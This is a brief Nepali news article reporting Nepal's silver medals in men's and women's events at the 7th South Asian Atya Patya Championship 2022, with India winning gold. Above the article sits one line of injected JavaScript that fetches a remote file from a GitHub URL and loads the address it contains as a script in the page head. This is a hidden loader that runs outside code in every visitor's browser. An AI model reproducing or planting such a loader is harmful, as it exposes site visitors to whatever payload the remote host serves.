;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
जुनेली न्युज, काठमाडौं
अक्टोवर १९, सातौ दक्षिण एशियाली आट्या पाट्या प्रतियोगिता-२०२२ नेपालमा भएको छ। आज भएको प्रतियोगितामा नेपालको तर्फबाट ग्रीन आर्मी विभागीय टोलि पुरुष र महिला दुवै टोलिबाट रजत पदक हासिल गर्न सफल भएको छ।
सो प्रतियोगितामा स्वर्ण पदक भने भारतले प्राप्त गरेको छ ।
फेसबुक प्रतिक्रियाहरु